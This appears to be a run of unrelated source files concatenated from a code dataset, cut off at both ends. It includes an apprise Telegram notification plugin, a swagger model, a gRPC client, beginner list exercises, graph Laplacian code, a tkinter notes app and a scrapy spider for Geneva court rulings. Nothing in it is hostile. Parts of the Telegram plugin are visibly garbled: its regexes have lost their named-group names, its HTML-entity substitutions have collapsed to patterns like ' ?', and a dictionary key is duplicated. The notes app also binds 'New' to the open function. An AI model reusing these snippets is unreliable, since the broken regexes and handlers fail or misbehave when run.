tokens\n template_tokens = dict(NotifyBase.template_tokens, **{\n 'bot_token': {\n 'name': _('Bot Token'),\n 'type': 'string',\n 'private': True,\n 'required': True,\n 'regex': (r'(bot)?[0-9]+:[a-z0-9_-]+', 'i'),\n },\n 'target_user': {\n 'name': _('Target Chat ID'),\n 'type': 'string',\n 'map_to': 'targets',\n 'map_to': 'targets',\n 'regex': (r'((-?[0-9]{1,32})|([a-z_-][a-z0-9_-]+))', 'i'),\n },\n 'targets': {\n 'name': _('Targets'),\n 'type': 'list:string',\n },\n })\n\n # Define our template arguments\n template_args = dict(NotifyBase.template_args, **{\n 'image': {\n 'name': _('Include Image'),\n 'type': 'bool',\n 'default': False,\n 'map_to': 'include_image',\n },\n 'detect': {\n 'name': _('Detect Bot Owner'),\n 'type': 'bool',\n 'default': True,\n 'map_to': 'detect_owner',\n },\n 'to': {\n 'alias_of': 'targets',\n },\n })\n\n def __init__(self, bot_token, targets, detect_owner=True,\n include_image=False, **kwargs):\n \"\"\"\n Initialize Telegram Object\n \"\"\"\n super(NotifyTelegram, self).__init__(**kwargs)\n\n try:\n self.bot_token = bot_token.strip()\n\n except AttributeError:\n # Token was None\n err = 'No Bot Token was specified.'\n self.logger.warning(err)\n raise TypeError(err)\n\n result = VALIDATE_BOT_TOKEN.match(self.bot_token)\n if not result:\n err = 'The Bot Token specified (%s) is invalid.' % bot_token\n self.logger.warning(err)\n raise TypeError(err)\n\n # Store our Bot Token\n self.bot_token = result.group('key')\n\n # Parse our list\n self.targets = parse_list(targets)\n\n self.detect_owner = detect_owner\n\n if self.user:\n # Treat this as a channel too\n self.targets.append(self.user)\n\n if len(self.targets) == 0 and self.detect_owner:\n _id = self.detect_bot_owner()\n if _id:\n # Store our id\n self.targets.append(str(_id))\n\n if len(self.targets) == 0:\n err = 'No chat_id(s) were specified.'\n self.logger.warning(err)\n raise TypeError(err)\n\n # Track whether or not we want to send an image with our notification\n # or not.\n self.include_image = include_image\n\n def send_image(self, chat_id, notify_type):\n \"\"\"\n Sends a sticker based on the specified notify type\n\n \"\"\"\n\n # The URL; we do not set headers because the api doesn't seem to like\n # when we set one.\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'sendPhoto'\n )\n\n # Acquire our image path if configured to do so; we don't bother\n # checking to see if selfinclude_image is set here because the\n # send_image() function itself (this function) checks this flag\n # already\n path = self.image_path(notify_type)\n\n if not path:\n # No image to send\n self.logger.debug(\n 'Telegram image does not exist for %s' % (notify_type))\n\n # No need to fail; we may have been configured this way through\n # the apprise.AssetObject()\n return True\n\n try:\n with open(path, 'rb') as f:\n # Configure file payload (for upload)\n files = {\n 'photo': f,\n }\n\n payload = {\n 'chat_id': chat_id,\n }\n\n self.logger.debug(\n 'Telegram image POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate))\n\n try:\n r = requests.post(\n url,\n files=files,\n data=payload,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = NotifyTelegram\\\n .http_response_code_lookup(r.status_code)\n\n self.logger.warning(\n 'Failed to send Telegram image: '\n '{}{}error={}.'.format(\n status_str,\n ', ' if status_str else '',\n r.status_code))\n\n self.logger.debug(\n 'Response Details:\\r\\n{}'.format(r.content))\n\n return False\n\n except 
requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured posting Telegram image.')\n self.logger.debug('Socket Exception: %s' % str(e))\n return False\n\n return True\n\n except (IOError, OSError):\n # IOError is present for backwards compatibility with Python\n # versions older then 3.3. >= 3.3 throw OSError now.\n\n # Could not open and/or read the file; this is not a problem since\n # we scan a lot of default paths.\n self.logger.error(\n 'File can not be opened for read: {}'.format(path))\n\n return False\n\n def detect_bot_owner(self):\n \"\"\"\n Takes a bot and attempts to detect it's chat id from that\n\n \"\"\"\n\n headers = {\n 'User-Agent': self.app_id,\n 'Content-Type': 'application/json',\n }\n\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'getUpdates'\n )\n\n self.logger.debug(\n 'Telegram User Detection POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate))\n\n try:\n r = requests.post(\n url,\n headers=headers,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = \\\n NotifyTelegram.http_response_code_lookup(r.status_code)\n\n try:\n # Try to get the error message if we can:\n error_msg = loads(r.content)['description']\n\n except Exception:\n error_msg = None\n\n if error_msg:\n self.logger.warning(\n 'Failed to detect the Telegram user: (%s) %s.' % (\n r.status_code, error_msg))\n\n else:\n self.logger.warning(\n 'Failed to detect the Telegram user: '\n '{}{}error={}.'.format(\n status_str,\n ', ' if status_str else '',\n r.status_code))\n\n self.logger.debug('Response Details:\\r\\n{}'.format(r.content))\n\n return 0\n\n except requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured detecting the Telegram User.')\n self.logger.debug('Socket Exception: %s' % str(e))\n return 0\n\n # A Response might look something like this:\n # {\n # \"ok\":true,\n # \"result\":[{\n # \"update_id\":645421321,\n # \"message\":{\n # \"message_id\":1,\n # \"from\":{\n # \"id\":532389719,\n # \"is_bot\":false,\n # \"first_name\":\"Chris\",\n # \"language_code\":\"en-US\"\n # },\n # \"chat\":{\n # \"id\":532389719,\n # \"first_name\":\"Chris\",\n # \"type\":\"private\"\n # },\n # \"date\":1519694394,\n # \"text\":\"/start\",\n # \"entities\":[{\"offset\":0,\"length\":6,\"type\":\"bot_command\"}]}}]\n\n # Load our response and attempt to fetch our userid\n response = loads(r.content)\n if 'ok' in response and response['ok'] is True:\n start = re.compile(r'^\\s*\\/start', re.I)\n for _msg in iter(response['result']):\n # Find /start\n if not start.search(_msg['message']['text']):\n continue\n\n _id = _msg['message']['from'].get('id', 0)\n _user = _msg['message']['from'].get('first_name')\n self.logger.info('Detected telegram user %s (userid=%d)' % (\n _user, _id))\n # Return our detected userid\n return _id\n\n self.logger.warning(\n 'Could not detect bot owner. 
Is it running (/start)?')\n\n return 0\n\n def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):\n \"\"\"\n Perform Telegram Notification\n \"\"\"\n\n headers = {\n 'User-Agent': self.app_id,\n 'Content-Type': 'application/json',\n }\n\n # error tracking (used for function return)\n has_error = False\n\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'sendMessage'\n )\n\n payload = {}\n\n # Prepare Email Message\n if self.notify_format == NotifyFormat.MARKDOWN:\n payload['parse_mode'] = 'MARKDOWN'\n\n else:\n # Either TEXT or HTML; if TEXT we'll make it HTML\n payload['parse_mode'] = 'HTML'\n\n # HTML Spaces ( ) and tabs ( ) aren't supported\n # See https://core.telegram.org/bots/api#html-style\n body = re.sub(' ?', ' ', body, re.I)\n\n # Tabs become 3 spaces\n body = re.sub(' ?', ' ', body, re.I)\n\n if title:\n # HTML Spaces ( ) and tabs ( ) aren't supported\n # See https://core.telegram.org/bots/api#html-style\n title = re.sub(' ?', ' ', title, re.I)\n\n # Tabs become 3 spaces\n title = re.sub(' ?', ' ', title, re.I)\n\n # HTML\n title = NotifyTelegram.escape_html(title, whitespace=False)\n\n # HTML\n body = NotifyTelegram.escape_html(body, whitespace=False)\n\n if title and self.notify_format == NotifyFormat.TEXT:\n # Text HTML Formatting\n payload['text'] = '%s\\r\\n%s' % (\n title,\n body,\n )\n\n elif title:\n # Already HTML; trust developer has wrapped\n # the title appropriately\n payload['text'] = '%s\\r\\n%s' % (\n title,\n body,\n )\n\n else:\n # Assign the body\n payload['text'] = body\n\n # Create a copy of the chat_ids list\n targets = list(self.targets)\n while len(targets):\n chat_id = targets.pop(0)\n chat_id = IS_CHAT_ID_RE.match(chat_id)\n if not chat_id:\n self.logger.warning(\n \"The specified chat_id '%s' is invalid; skipping.\" % (\n chat_id,\n )\n )\n\n # Flag our error\n has_error = True\n continue\n\n if chat_id.group('name') is not None:\n # Name\n payload['chat_id'] = '@%s' % chat_id.group('name')\n\n else:\n # ID\n payload['chat_id'] = int(chat_id.group('idno'))\n\n # Always call throttle before any remote server i/o is made;\n # Telegram throttles to occur before sending the image so that\n # content can arrive together.\n self.throttle()\n\n if self.include_image is True:\n # Send an image\n self.send_image(payload['chat_id'], notify_type)\n\n self.logger.debug('Telegram POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate,\n ))\n self.logger.debug('Telegram Payload: %s' % str(payload))\n\n try:\n r = requests.post(\n url,\n data=dumps(payload),\n headers=headers,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = \\\n NotifyTelegram.http_response_code_lookup(r.status_code)\n\n try:\n # Try to get the error message if we can:\n error_msg = loads(r.content)['description']\n\n except Exception:\n error_msg = None\n\n self.logger.warning(\n 'Failed to send Telegram notification to {}: '\n '{}, error={}.'.format(\n payload['chat_id'],\n error_msg if error_msg else status_str,\n r.status_code))\n\n self.logger.debug(\n 'Response Details:\\r\\n{}'.format(r.content))\n\n # Flag our error\n has_error = True\n continue\n\n else:\n self.logger.info('Sent Telegram notification.')\n\n except requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured sending Telegram:%s ' % (\n payload['chat_id']) + 'notification.'\n )\n self.logger.debug('Socket Exception: %s' % str(e))\n\n # Flag our error\n has_error = True\n continue\n\n return not 
has_error\n\n def url(self):\n \"\"\"\n Returns the URL built dynamically based on specified arguments.\n \"\"\"\n\n # Define any arguments set\n args = {\n 'format': self.notify_format,\n 'overflow': self.overflow_mode,\n 'image': self.include_image,\n 'verify': 'yes' if self.verify_certificate else 'no',\n 'detect': 'yes' if self.detect_owner else 'no',\n }\n\n # No need to check the user token because the user automatically gets\n # appended into the list of chat ids\n return '{schema}://{bot_token}/{targets}/?{args}'.format(\n schema=self.secure_protocol,\n bot_token=NotifyTelegram.quote(self.bot_token, safe=''),\n targets='/'.join(\n [NotifyTelegram.quote('@{}'.format(x)) for x in self.targets]),\n args=NotifyTelegram.urlencode(args))\n\n @staticmethod\n def parse_url(url):\n \"\"\"\n Parses the URL and returns enough arguments that can allow\n us to substantiate this object.\n\n \"\"\"\n # This is a dirty hack; but it's the only work around to tgram://\n # messages since the bot_token has a colon in it. It invalidates a\n # normal URL.\n\n # This hack searches for this bogus URL and corrects it so we can\n # properly load it further down. The other alternative is to ask users\n # to actually change the colon into a slash (which will work too), but\n # it's more likely to cause confusion... So this is the next best thing\n # we also check for %3A (incase the URL is encoded) as %3A == :\n try:\n tgram = re.match(\n r'(?P{schema}://)(bot)?(?P([a-z0-9_-]+)'\n r'(:[a-z0-9_-]+)?@)?(?P[0-9]+)(:|%3A)+'\n r'(?P.*)$'.format(\n schema=NotifyTelegram.secure_protocol), url, re.I)\n\n except (TypeError, AttributeError):\n # url is bad; force tgram to be None\n tgram = None\n\n if not tgram:\n # Content is simply not parseable\n return None\n\n if tgram.group('prefix'):\n # Try again\n results = NotifyBase.parse_url('%s%s%s/%s' % (\n tgram.group('protocol'),\n tgram.group('prefix'),\n tgram.group('btoken_a'),\n tgram.group('remaining')))\n\n else:\n # Try again\n results = NotifyBase.parse_url(\n '%s%s/%s' % (\n tgram.group('protocol'),\n tgram.group('btoken_a'),\n tgram.group('remaining'),\n ),\n )\n\n # The first token is stored in the hostname\n bot_token_a = NotifyTelegram.unquote(results['host'])\n\n # Get a nice unquoted list of path entries\n entries = NotifyTelegram.split_path(results['fullpath'])\n\n # Now fetch the remaining tokens\n bot_token_b = entries.pop(0)\n\n bot_token = '%s:%s' % (bot_token_a, bot_token_b)\n\n # Store our chat ids (as these are the remaining entries)\n results['targets'] = entries\n\n # Support the 'to' variable so that we can support rooms this way too\n # The 'to' makes it easier to use yaml configuration\n if 'to' in results['qsd'] and len(results['qsd']['to']):\n results['targets'] += \\\n NotifyTelegram.parse_list(results['qsd']['to'])\n\n # Store our bot token\n results['bot_token'] = bot_token\n\n # Include images with our message\n results['include_image'] = \\\n parse_bool(results['qsd'].get('image', False))\n\n # Include images with our message\n results['detect_owner'] = \\\n parse_bool(results['qsd'].get('detect', True))\n\n return results\n","repo_name":"webflo-dev/bazarr","sub_path":"bazarr/libs/apprise/plugins/NotifyTelegram.py","file_name":"NotifyTelegram.py","file_ext":"py","file_size_in_byte":19772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"72573701692","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom clashofcubicles.models.message import Message\nfrom 
clashofcubicles.models.task import Task\nfrom clashofcubicles.models.worker import Worker\nfrom .base_model_ import Model\nfrom datetime import date, datetime\nfrom typing import List, Dict\nfrom ..util import deserialize_model\n\n\nclass Message(Model):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, id=None, recipients=None, sender=None, text=None, attachments=None):\n \"\"\"\n Message - a model defined in Swagger\n\n :param id: The id of this Message.\n :type id: int\n :param recipients: The recipients of this Message.\n :type recipients: List[Worker]\n :param sender: The sender of this Message.\n :type sender: Message\n :param text: The text of this Message.\n :type text: str\n :param attachments: The attachments of this Message.\n :type attachments: List[Task]\n \"\"\"\n self.swagger_types = {\n 'id': int,\n 'recipients': List[Worker],\n 'sender': Message,\n 'text': str,\n 'attachments': List[Task]\n }\n\n self.attribute_map = {\n 'id': 'id',\n 'recipients': 'recipients',\n 'sender': 'sender',\n 'text': 'text',\n 'attachments': 'attachments'\n }\n\n self._id = id\n self._recipients = recipients\n self._sender = sender\n self._text = text\n self._attachments = attachments\n\n @classmethod\n def from_dict(cls, dikt):\n \"\"\"\n Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Message of this Message.\n :rtype: Message\n \"\"\"\n return deserialize_model(dikt, cls)\n\n @property\n def id(self):\n \"\"\"\n Gets the id of this Message.\n\n :return: The id of this Message.\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"\n Sets the id of this Message.\n\n :param id: The id of this Message.\n :type id: int\n \"\"\"\n if id is None:\n raise ValueError(\"Invalid value for `id`, must not be `None`\")\n\n self._id = id\n\n @property\n def recipients(self):\n \"\"\"\n Gets the recipients of this Message.\n\n :return: The recipients of this Message.\n :rtype: List[Worker]\n \"\"\"\n return self._recipients\n\n @recipients.setter\n def recipients(self, recipients):\n \"\"\"\n Sets the recipients of this Message.\n\n :param recipients: The recipients of this Message.\n :type recipients: List[Worker]\n \"\"\"\n if recipients is None:\n raise ValueError(\"Invalid value for `recipients`, must not be `None`\")\n\n self._recipients = recipients\n\n @property\n def sender(self):\n \"\"\"\n Gets the sender of this Message.\n\n :return: The sender of this Message.\n :rtype: Message\n \"\"\"\n return self._sender\n\n @sender.setter\n def sender(self, sender):\n \"\"\"\n Sets the sender of this Message.\n\n :param sender: The sender of this Message.\n :type sender: Message\n \"\"\"\n\n self._sender = sender\n\n @property\n def text(self):\n \"\"\"\n Gets the text of this Message.\n\n :return: The text of this Message.\n :rtype: str\n \"\"\"\n return self._text\n\n @text.setter\n def text(self, text):\n \"\"\"\n Sets the text of this Message.\n\n :param text: The text of this Message.\n :type text: str\n \"\"\"\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\")\n\n self._text = text\n\n @property\n def attachments(self):\n \"\"\"\n Gets the attachments of this Message.\n\n :return: The attachments of this Message.\n :rtype: List[Task]\n \"\"\"\n return self._attachments\n\n @attachments.setter\n def attachments(self, attachments):\n \"\"\"\n Sets the attachments of this Message.\n\n :param attachments: The 
attachments of this Message.\n :type attachments: List[Task]\n \"\"\"\n\n self._attachments = attachments\n\n","repo_name":"grubino/clashofcubicles-api","sub_path":"clashofcubicles/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16829844474","text":"# coding=utf-8\nfrom __future__ import print_function\n\nimport time\n\nimport google\nimport grpc\n\nfrom proto import product_pb2\nfrom proto import product_pb2_grpc\n\nfrom proto import book_pb2\nfrom proto import book_pb2_grpc\n\n\ndef run_product():\n channel = grpc.insecure_channel('127.0.0.1:50051')\n stub = product_pb2_grpc.ProductInfoStub(channel)\n\n response = stub.addProduct(\n product_pb2.Product(id=str(time.time()), name='Hello World! This is message from client!'))\n print(\"addProduct received: %s\" % response.value)\n\n response = stub.getProduct(\n product_pb2.ProductId(value=str(time.time())))\n print(\"getProduct received: %s\" % response.name)\n\n\ndef run_book():\n channel = grpc.insecure_channel('127.0.0.1:50051')\n stub = book_pb2_grpc.BookServiceStub(channel)\n\n # addBook\n response = stub.addBook(\n book_pb2.Book(id=str(time.time()), name='Hello World! This is message from client!'))\n print(\"addBook received: %s, %s\" % (type(response), response))\n\n # getBook\n response = stub.getBook(google.protobuf.wrappers_pb2.StringValue(value=\"2\"))\n print(\"getBook received: %s, %s\" % (type(response), response))\n\n # searchBooks\n response = stub.searchBooks(google.protobuf.wrappers_pb2.StringValue(value=\"明清小说\"))\n for x in response:\n print(\"searchBooks received: %s, %s\" % (type(x), x))\n\n # updateBooks\n def generate_book_messages():\n for x in range(10):\n yield book_pb2.Book(id=str(time.time()), name='Hello World! This is message from client!')\n\n response = stub.updateBooks(generate_book_messages())\n print(\"updateBooks received: %s, %s\" % (type(response), response))\n\n # processBooks\n def generate_string_messages():\n for x in range(10):\n yield google.protobuf.wrappers_pb2.StringValue(value=str(time.time()) + ' Hello World! 
This is message from client!')\n response = stub.processBooks(generate_string_messages())\n for x in response:\n print(\"processBooks received: %s, %s\" % (type(x), x))\n\n\nif __name__ == '__main__':\n run_book()\n","repo_name":"tyronecai/grpc_demo","sub_path":"python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42266812593","text":"#!/usr/bin/env python3\n\"\"\"Alta3 Research | MayuriDalavai\n List, Input, Print, Concatenate, Variables\"\"\"\nimport random\n\ndef main():\n\n # create a wordbank list \n wordbank = [\"indentation\", \"spaces\"]\n\n # create a students list\n tlgstudents = [\"Aaron\", \"Andy\", \"Asif\", \"Brent\", \"Cedric\", \"Chris\", \"Cory\", \"Ebrima\",\n \"Franco\", \"Greg\", \"Hoon\", \"Joey\", \"Jordan\", \"JC\", \"LB\", \"Mabel\", \"Shon\", \"Pat\", \"Zach\"]\n\n # append 4 to the list wordbank\n wordbank.append(4)\n print(wordbank)\n\n num =int(input(\"choose a number between 0 and 18: \"))\n name = tlgstudents[num]\n\n print(f\"Your Choice of tlgstudents is {name}!\")\n print(f\"{name} always uses {wordbank[2]} {wordbank[1]} to indent.\")\n\n name = random.choice(tlgstudents)\n print(f\"{name}\")\n\n\nmain() \n","repo_name":"Mayuridalavai/mycode","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7751707734","text":"import numpy as np\nimport scipy.sparse, scipy.linalg, scipy.spatial\nimport sklearn.metrics\n\ndef grid(m, dtype=np.float32):\n \"\"\"Return the embedding of a grid graph.\"\"\"\n M = m**2\n x = np.linspace(0, 1, m, dtype=dtype)\n y = np.linspace(0, 1, m, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z\n\ndef distance_sklearn_metrics(z, k=4, metric='euclidean'):\n \"\"\"Compute exact pairwise distances.\"\"\"\n d = sklearn.metrics.pairwise.pairwise_distances(\n z, metric=metric, n_jobs=-2)\n # k-NN graph.\n idx = np.argsort(d)[:, 1:k+1]\n d.sort()\n d = d[:, 1:k+1]\n return d, idx\n\ndef adjacency(dist, idx):\n \"\"\"Return the adjacency matrix of a kNN graph.\"\"\"\n M, k = dist.shape\n assert M, k == idx.shape\n assert dist.min() >= 0\n\n # Weights.\n sigma2 = np.mean(dist[:, -1])**2\n dist = np.exp(- dist**2 / sigma2)\n\n # Weight matrix.\n I = np.arange(0, M).repeat(k)\n J = idx.reshape(M*k)\n V = dist.reshape(M*k)\n W = scipy.sparse.coo_matrix((V, (I, J)), shape=(M, M))\n\n # No self-connections.\n W.setdiag(0)\n\n # Non-directed graph.\n bigger = W.T > W\n W = W - W.multiply(bigger) + W.T.multiply(bigger)\n\n assert W.nnz % 2 == 0\n assert np.abs(W - W.T).mean() < 1e-10\n assert type(W) is scipy.sparse.csr.csr_matrix\n return W\n\ndef laplacian(W, normalized=True):\n \"\"\"Return the Laplacian of the weigth matrix.\"\"\"\n\n # Degree matrix.\n d = W.sum(axis=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n d += np.spacing(np.array(0, W.dtype))\n d = 1 / np.sqrt(d)\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L\n\na = grid(3)\ndist, idx = distance_sklearn_metrics(a, k=4, metric='euclidean')\nA = adjacency(dist, idx)\nL = laplacian(A, 
normalized=True)","repo_name":"GitLanx/MultiModalSeg","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3933903711","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\n\r\n\r\nclass NotesApp(tk.Tk):\r\n def __init__(self):\r\n super().__init__()\r\n self.title(\"Notes App\")\r\n self.geometry(\"400x300\")\r\n\r\n self.text_area = tk.Text(self, wrap=\"word\")\r\n self.text_area.pack(expand=True, fill=\"both\")\r\n\r\n self.menu_bar = tk.Menu(self)\r\n self.file_menu = tk.Menu(self.menu_bar, tearoff=0)\r\n self.file_menu.add_command(label=\"New\", command=self.open_note)\r\n self.file_menu.add_command(label=\"Open\", command=self.open_note)\r\n self.file_menu.add_command(label=\"Save\", command=self.save_note)\r\n self.file_menu.add_command(label=\"Exit\", command=self.quit)\r\n self.menu_bar.add_cascade(label=\"File\", menu=self.file_menu)\r\n self.config(menu=self.menu_bar)\r\n\r\n self.current_file = None\r\n\r\n def new_note(self):\r\n self.text_area.delete(1.0, tk.END)\r\n self.current_file = None\r\n\r\n def open_note(self):\r\n file_path = filedialog.askopenfilename(filetypes=[(\"Text Files\", \"*.txt\")])\r\n if file_path:\r\n with open(file_path, \"r\") as file:\r\n self.text_area.delete(1.0, tk.END)\r\n self.text_area.insert(tk.END, file.read())\r\n self.current_file = file_path\r\n\r\n def save_note(self):\r\n if self.current_file:\r\n with open(self.current_file, \"w\") as file:\r\n file.write(self.text_area.get(1.0, tk.END))\r\n else:\r\n file_path = filedialog.asksaveasfilename(\r\n defaultextension=\".txt\", filetypes=[(\"Text Files\", \"*.txt\")]\r\n )\r\n if file_path:\r\n with open(file_path, \"w\") as file:\r\n file.write(self.text_area.get(1.0, tk.END))\r\n self.current_file = file_path\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = NotesApp()\r\n app.mainloop()\r\n","repo_name":"ExpertCoder101/GUI-Apps","sub_path":"GUI App 5.py","file_name":"GUI App 5.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20452365190","text":"#Kreye yon lis eleman ki divizib pa 2, nan entèval [0-n] enklizif\nn = int (input (\"Rantre pi gwo nonb ou vle nan lis ou a : \\n\"))\nlist1 = []\nfor i in range(n + 1) :\n if i%2 == 0:\n list1.append(i)\nprint(f\"Premye lis nou an ki fet ak nonb ki divizib pa 2 : {list1} \\n\")\n\n#Ou gen yon lis antye, konvèti l an yon lis chenn\nchenn1= ''.join(map(str,list1))\nprint(f\"Lis chenn lan se :{chenn1} \\n\")\n\n#Ou gen yon lis chenn ki an miniskil, konvèti an yon lis chenn majiskil\nMajiskil = chenn1.upper()\nprint(f\"Lis la an majiskil se : {Majiskil} \\n\")\n\n#Ou gen yon lis, kreye yon nouvo lis ki fèt ak eleman ki nan endèks ki divizib pa 3 yo sèlman\nlist2=[]\nfor i in range(len(list1)):\n if i % 3 ==0:\n list2.append(list1[i])\nprint ( f\"Nonb ki nan endeks divizib pa 3 yo se :{list2} \\n\" )\n\n#Ou gen lis eleman, kreye yon nouvo lis ki gen chak 3 eleman yo gwoupe anndan yon tipl.\nlist3 = []\nfor i in range(0, len(list1),3):\n gwoup= tuple (list1[i:i+3])\n list3.append(gwoup)\nprint(f\"Eleman yo regwoupe pa 3 nan list sa a : {list3} \\n\")\n\n#Ou gen yon lis, ki gen yon pakèt eleman ki repete. Konvèti l an yon lis, ki pa gen okenn doublon\nlistSanDoublon= list(set(list1 + list3))\nprint(f\"List ki San Doublon an se :{listSanDoublon} \\n\")\n\n#Ou gen 2 lis. 
Kreye yon nouvo lis, ki genyen sèlman eleman komen ant 2 lis yo\nlistSanDoublon1 = list(set(list1 + list2))\nprint(f\"Eleman komen yo se : {listSanDoublon1} \\n\")\n\n#Ou gen 2 lis. Kreye yon nouvo lis, ki genyen sèlman eleman distenge ant 2 lis yo\nlist4= list1 + listSanDoublon1\nListDistenge = []\nfor element in list1:\n if element not in listSanDoublon1 :\n ListDistenge.append(element)\nfor element in listSanDoublon1:\n if element not in list1 :\n ListDistenge.append(element)\nprint(f\"Nou te melanje List1 ak list san doublon. \\ n Eleman nan premye lis la se {list1}, eleman nan list san doublon an se{listSanDoublon1} \\n Lis distenge a se : {ListDistenge} \\n\")\n\n#Ou gen yon diksyonè. Kreye yon nouvo lis ak kle yo sèlman, epi yon lòt ak valè yo sèlman\ndiksyone = { 'nom': 'Simy', 'prenom' :'Lynne', 'lekol': 'ESIH'}\nlisKle = list(diksyone.keys())\nlisVale = list(diksyone.values())\nprint(f\"Nan diksyone sa, kle yo se {lisKle} epi vale yo se {lisVale} \\n \")\n\n#Reyini 3 lis ansanm, san okenn doublon\nDenyelist= list(set(list1 + list2+ listSanDoublon1))\nprint(f\"Denye lis la reyini 3 li ansanm. Vale yo se {Denyelist} \\n\")\n\n","repo_name":"Lynne30/Devoir-L4","sub_path":"LIST.py","file_name":"LIST.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"ht","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10293096055","text":"'''\r\nCreated on 2020. 8. 18.\r\n\r\n@author: GDJ24\r\n'''\r\nimport openpyxl # pip install openpyxl\r\nfilename = \"sales_2015.xlsx\"\r\nbook = openpyxl.load_workbook(filename)\r\nfor sheet in book.worksheets :\r\n data = []\r\n \r\n for row in sheet.rows :\r\n line = []\r\n for i, c in enumerate(row) :\r\n line.append(c.value)\r\n print(line)\r\n data.append(line)","repo_name":"jkh2801/python","sub_path":"pythonEx1/excel2.py","file_name":"excel2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26642951095","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GeCcsSpider(scrapy.Spider):\n name = 'ge_ccs'\n allowed_domains = ['justice.geneve.ch']\n start_urls = ['http://justice.geneve.ch/tdb/Decis/CJ/ACJC/acjc.tdb?SFT=&S=*']\n\n def parse(self, response):\n alles = response.xpath('//div/div/b/a')\n for sel in alles:\n link = sel.xpath('.//@href').extract_first()\n link = response.urljoin(link)\n yield scrapy.Request(url=link, callback=self.weiter)\n\n next_page = response.xpath('//a[contains(text(), \"Suivant\")]/@href').extract_first()\n next_page = response.urljoin(next_page)\n# print next_page\n if next_page is not None:\n yield scrapy.Request(next_page, callback=self.parse)\n\n def weiter(self, response):\n url = response.xpath('//tr/td/div/a/@href').extract_first().encode('utf-8')\n url = response.urljoin(url)\n ref = url.rsplit('/', 1)[-1]\n# print url\n# print ref\n\n item = decision()\n item['referenz'] = ref\n item['file_urls'] = [url]\n yield item\n\nclass decision(scrapy.Item):\n url = scrapy.Field()\n file_urls = scrapy.Field()\n files = scrapy.Field()\n referenz = scrapy.Field()\n\n\n\n","repo_name":"Velofisch/entscheidsuche","sub_path":"Crawler/ge_cc/ge_cc/spiders/ge_ccs.py","file_name":"ge_ccs.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"14630785555","text":"#!/usr/bin/python3\n## Convert a large PGN to sqlite database (selected headers), batched commit for\n## speed up.\n\nimport 
